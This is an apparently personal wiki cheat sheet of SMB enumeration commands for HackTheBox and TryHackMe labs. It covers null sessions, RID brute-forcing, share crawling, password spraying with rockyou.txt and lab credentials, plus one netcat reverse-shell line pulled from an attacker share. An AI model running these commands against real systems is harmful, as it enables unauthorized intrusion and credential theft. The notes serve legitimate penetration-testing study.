-
Notifications
You must be signed in to change notification settings - Fork 14
Samba SMB
Alvin Smith edited this page Sep 18, 2022
·
47 revisions
-
smbclient -N -L \\\\10.10.10.103list or connect with sharenamesmbclient \\\\active.htb\\Replication smbclient //10.10.210.209/milesdyson -U=milesdyson%)s{A&2Z=F^n_E.B
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
smbget -R smb://10.10.210.209/milesdyson/notes/important.txt -U=milesdyson%)s{A&2Z=F^n_E.B
smbclient -L 10.10.1.X -U=svc-admin%'password'-
smbmap -H active.htborsmbmap -H ip -u ''or nullsmbmap -H ip -u null -p '' crackmapexec smb <IP> --shares
python3 /usr/share/doc/python3-impacket/examples/lookupsid.py anonymous@10.10.171.0 | tee usernames
cat usernames | grep SidTypeUser |gawk -F '\' '{ print $2 }' |gawk -F ' ' '{ print $1 }' |tee usernames
or
crackmapexec smb 10.10.222.122 -u 'guest' -p '' --rid-brute- https://sidchn.github.io/posts/thm-vullnet-roasted/
- https://infosecwriteups.com/thm-writeup-vulnnet-roasted-8f4e18314ca7
smbmap -R Share\Path -H <IP> --depth 10smbmap -R Replication -H active.htb --depth 10
smbmap -R Replication -H active.htb -A Groups.xml -q --depth 10
updatedb && locate Groups.xml
smbclient \\\\10.10.1.228\\Sharename -U=svc-admin%'pw'
crackmapexec smb/ssh <IP> -d <DOMAIN> -u user/file -p rockyou.txt
https://github.com/byt3bl33d3r/CrackMapExec/wiki/Using-Credentials,-NULL-Sessions,-PtH-Attacks
python /some/path/impacket/examples/smbserver.py share .
// on windows target or RCE
copy \\<attackIP>\share\nc.exe C:\nc.exe;C:\nc.exe <attackIP> <PORT> -e cmd.exe
rpcclient -U "" -N $IP #No credshttps://book.hacktricks.xyz/pentesting/pentesting-smb#obtain-information
https://github.com/CiscoCXSecurity/enum4linux
enum4linux -a -M -l -d <IP> 2>&1 | tee "/home/user/scans/enum4linux.txt"
#!/usr/bin/env python3
import smtplib
host = '127.0.0.1'
port = 25
From = 'send@domain.alvin'
To = 'to@domain.alvin'
Message = '''\
Subject: HI ALVIN
'''
try:
io = smtplib.SMTP(host,port)
io.ehlo()
io.sendmail(From,To,Message)
except Exceptions as e:
print (e)
finally:
io.quit()
sudo mount -t cifs //10.129.1.39/shares /mnt/csharename
find . -ls | tee ~/home/alvin/tree.txt
HackTheBox/Windows/Remote/README.md
7z l *.vhd
guestmount
https://github.com/A1vinSmith/OSCP-PWK/tree/master/HackTheBox/Windows/Sizzle
smbcacls -N '//10.129.230.198/Department Shares' Users
for i in $(ls); do echo $i; smbcacls -N '//10.129.230.198/Department Shares' $i; done
smbcacls -N '//10.129.230.198/Department Shares' Users/Publichttps://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf